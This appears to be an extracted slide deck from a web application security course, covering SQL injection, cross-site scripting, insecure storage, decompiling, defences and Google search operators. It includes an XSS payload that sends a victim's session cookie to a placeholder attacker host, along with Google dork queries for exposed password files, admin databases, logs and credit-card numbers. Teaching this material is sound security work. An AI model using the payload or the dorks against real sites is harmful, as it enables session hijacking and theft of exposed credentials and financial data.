web application security. agenda attacks types web applications and google what can be done?

Web Application Security

Agenda

Attacks Types Web applications and Google What can be done?

Attack Types

Attack TypesWeb Application Vulnerabilities (OWASP Top 10)

Broken Access Control Broken Authentication and Session Management Buffer Overflows Denial of Service Insecure Configuration Management Poor Input Validation Injection Flaws (SQL Injection) Cross Site Scripting (XSS) Improper Error Handling Insecure Storage Reversing/decompiling

Attack TypesWeb Application Vulnerabilities

Where can a web application be exploited? Inputs, outputs... Querystrings (www.ezenta.com/file.php?id=34) Form params (&name=sarid&phone=12121212) HTTP Headers Cookies Local Files? Anywhere a client has access to parameters

Web application SecuritySQL Injection

Attack TypesSQL Injection

The exploitation of weaknesses in a web application, ultimately enabling users to utlize functionality located within the database server framework.

Attack TypesSQL Injection (Cont.)

Who is vulnerable? MS SQL Oracle Sybase DB2 MySQL Mm.

Not the fault of the database software but rather the fault of the developers that utilise these databases.

Attack TypesSQL Injection (Cont.)

What can happen? Information leakage Data manipulation: INSERT, UPDATE, DELETE, … Execution of Stored Procedures (i.e. MSSQL) Data theft

What would you want if you were the attacker?

Attack TypesSQL Injection (Cont.)

How would an attacker launch an attack in an attempt to gain access to a web server/DB server?

Prerequisites Some outbound trafic must be permitted, the user must know

which port The database’s user must be able to execute the EXEC

command The attacker must have some server (TFTP/FTP) from shich

files can be retrieved

Internet

Attacker User

FTP Server

Firewall Web Server

Internet

Attacker User

FTP Server

Firewall Web Server

Internet

Attacker User

FTP Server

Firewall Web Server

Internet

Attacker User

FTP Server

Firewall Web Server

Attack TypesSQL Injection (Cont.)

DEMO: http://www.hackme.dk Identifying vulnerabilities Gathering info. about the DB: name, structure Altering data Running commands Error based/blind SQL injection Stored Procedures

GAME OVER

Web application SecurityCross Site Scripting (XSS)

Attack TypesCross Site Scripting (XSS)

Attack aimed at the users of a web application, possible as a result of poor programming practices.

Attack TypesCross Site Scripting (Cont.)

Two types:

Transient: The exploit is composed and delivered. Is generally executed just the one time.

Persistent: The exploit is composed and written to some data store. An example is a forum post.

Attack TypesCross Site Scripting (Cont.)

Transient: The victim has to perform an action in order for the attack to work. Click on a link Download a file (eMule, Kazaa, Skype, MSN, …)

Persistent: The attacked is executed simply by visiting the compromised web application.

Attack TypesCross Site Scripting (Cont.)

So you can execute some script in the user’s browser, who cares? Right?

Attack TypesCross Site Scripting (Cont.)

What can happen? Information known only to the user and the web server ( in this

case session identifiers ) can be stolen. Sound scary? Consider this....

Ordering perscriptions over the net? Medical test results? On-line psychological consultations: Are you sure you’re

chatting to a doctor? Using netbank?

Attack TypesCross Site Scripting (Cont.)

Net Bank Recently found a vulnerability that would enable an attacker to

create a false net bank logon. When the user entered their username and password, the details were sent to a third server.

This is real!

Attack TypesCross Site Scripting (Cont.)

Who is vulnerable? JAVA .NET ASP PHP CF Mm.

It’s not MS’, Sun’s, Allaire’s or Novell’s fault (not always). It’s the fault of the developer!

Attack TypesCross Site Scripting (Cont.)

How do users’ sessions get hijacked? A vulnerability is identified. An exploit is developed (as shown on next slide). The exploit is sent to the victim (transient) or posted in a

vulnerable page (persistant). The user clicks on the link (tansient) or visits the vulnerable

page (persistant). The user’s session identifier is sent to the attacker. The stolen session identifier is included in the attacker’s request

( shown in the demo ).

Attack TypesCross Site Scripting (Cont.)

A simple transient XSS attack:www.somesite.com/vulnerable.php?email=sarid_harper@somesite.com <script> window.open('http://<ATTACKER>/write_to_file.o?Session='+document.cookie,'obj_window','fullscreen=no,toolbar=no,status=no,menubar=no,scrollbars=no,resizable=yes,directories=no,location=no,width=100,height=100');</script>

All on one line.

Attack TypesCross Site Scripting (Cont.)

How do users’ sessions get hijacked? A vulnerability is identified. An exploit is developed. The exploit is sent to the victim (transient) or posted in a

vulnerable page (persistant). The user clicks on the link (tansient) or visits the vulnerable

page (persistant). The user’s session identifier is sent to the attacker. The stolen session identifier is included in the attacker’s request

( shown in the demo ).

Internet

User

Attacker

Firewall Web Server

Internet

User

Attacker

Firewall Web Server

Attack TypesCross Site Scripting (Cont.)

How do users’ sessions get hijacked? A vulnerability is identified. An exploit is developed. The exploit is sent to the victim (transient) or posted in a

vulnerable page (persistant). The user clicks on the link (tansient) or visits the vulnerable

page (persistant). The user’s session identifier is sent to the attacker. The stolen session identifier is incorporated into the attacker’s

request ( shown in the demo ).

Attack TypesCross Site Scripting (Cont.)

DEMO: http://www.hackme.dk

Web application SecurityImproper Error Handling

Attack TypesImproper Error Handling

Reading error messages in an attempt to gain an understanding of the platform and technologies deployed

Attack TypesImproper Error Handling (Cont.)

What can you learn from error messages? What database is being used If the developers are trying to hide what server side

technology is being used (by associating *.abc files with the asp.dll), it can be disclosed here

Usernames and passwords included in the connection string

Web application SecurityInsecure Storage

Attack TypesInsecure Storage – What is it?

The implementation of poor storage schemes used to store sensative information such as credit card details and the like

Attack TypesInsecure Storage (cont.)

How can this type of vulnerability be found? Google Comments in a page’s source Error rmessages Filenames in temporary Mange more.

Attack TypesInsecure Storage (cont.)

What are we looking for…

Attack TypesInsecure Storage (cont.)

What other examples are there? Poor implementation of encryption algos Attempting to create your own encryption algo simple XOR

methods

Attack TypesInsecure Storage (cont.)

Demo Password files

"your password is" filetype:log allinurl:admin ext:mdb

Credit card information allinurl:customers ext:mdb allinurl:shopping ext:mdb

Attack TypesReversing/decompiling

Java and .NET can be decompiled The source code can be read What tools exist to enable this?

Java: DJ Decompiler .NET: Salamander (http://www.remotesoft.com/salamander/)

Attack TypesReversing/decompiling (cont.)

Differences between native code and VM Native code = ASM Java/.NET = the original code

Native code DEMO Java/.NET DEMO

Attack TypesReversing/decompiling (cont.)

Protection schemes for native code ASProtect ExeShield ACProtector Armadillo ExeCrypter PElock

Can they then be broken? It seem like it

What does the file now look like?

Attack TypesReversing/decompiling (cont.)

Protection schemes for Java/.NET Obfuscation HASP

Can they then be broken?

What does the file now look like?

Attack TypesReversing/decompiling (cont.)

What protection schemes do you use? Do they work?

Web application SecurityWhat can be done?

What can be done?Who is responsible?

Customers can make demands! Development houses can educate developers!

What can be done?Design

Threat Modelling; Understanding the threats (covered on day 2):”But we don’t use sessions””But we use SSL”

Code Reviews (briefly covered on day 2) Ask questions! Check lists Defence in depth Secure defaults

What can be done?Implementation

Secure programming principles and practices, educate developers (Think like an attacker)

Input validation Output validation/encoding Fail safely Perform peer code reviews Reuse code that is know to be secure .....

What can be done?Audit

Perform automated testing as well as manual (some of the tools available are covered on day two)

Test at every development stage Make a test plan Test all components

What can be done?Configuration Management

The secure configuration of the implemented platform (covered on day 2)

Web application SecurityWeb applications and Google

Web applications and GoogleGoogles’ advanced search operators

Alternate query types cache link:www.ezenta.com related:www.securityfocus.com info:www.google.com

Query Modifiers site:[ whitehouse.gov | www.whitehouse.gov ] allintitle:hacking tomcat intitle:hacking tomcat = intitle:hacking intext:tomcat allinurl:admin database inurl:admin database = intitle:admin intext:database

Web applications and GoogleGoogles’ advanced search operators (cont.)

Query Modifiers (cont.) filetype:doc ext:php (same as above) inanchor:funnystuff (<a href=target>funnystuff</a>) numrange:1111-9999 or 1111..9999 daterange:2453706-2453710 (represented in Julian time) phonebook:first last state

Web applications and GoogleWhat can you use this for?

Error messages as shown earlier Password files Login pages Logs Shopping information Online devices Source code?

Web applications and GoogleError messages as shown earlier

Try and find error messages that you are familiar with by using Googles’ advanced operators

Web applications and GoogleError messages as shown earlier

“A syntax error has occurred” filetype:ihtml “Incorrect syntax near” ”Internal Server Error” ”server at”

Web applications and GooglePassword files

Try and find some password details using Google

Web applications and GooglePassword files

intitle:”index of /etc” intext:(passwd | shadow) inurl:admin ext:(mdb | log | pwd | tmp | txt | bak)

intext:”your password is *” intext:”please use the following username * and

password *”

Web applications and GoogleLogin pages

Find some login pages that you are familiar with

Web applications and GoogleLogin pages

allinurl:login admin cms "You have requested access to a restricted area of our

website. Please authenticate yourself to continue.“ intitle:"Tomcat Server Administration"

Web applications and GoogleLogs

Find some common log files using Google

Web applications and GoogleLogs

inurl:log ext:(log | txt) inurl:admin ext:(log | txt) intitle:"index.of./“ allinurl:logs ftp security

Web applications and GoogleShopping information

Shopping information exists on web sites and Google knows about it. Find it!

Web applications and GoogleShopping information

inurl:shop database Mastercard 5111111111111111..5999999999999999

ext:(log | mdb | tmp | bak | txt) Visa 4111111111111..4999999999999 ext:(log | mdb |

tmp | bak | txt) Amex 371111111111111..379999999999999 ext:(log

| mdb | tmp | bak | txt)

Web applications and GoogleOnline devices

Do you use any online devices like WAPs? Find some online devices you are familiar with.

Web applications and GoogleOnline devices

intitle:"Live View / - AXIS” intitle:webeye inurl:login.ml inurl:"printer/main.html" intext:"settings” intitle:"Network Storage Link for USB 2.0 Disks"

Firmware (http://173016th.com/)

Web applications and GoogleSource Code

Find source code fragments with Google

Web applications and GoogleSource Code

intext:"ADODB.Recordset" ext:inc inurl:index.php.bak

Web application SecuritySummary

Bad programming can introduce huge issues Security awareness and education can help raise

security Google can be used for data mining Keep your

environment clean.

?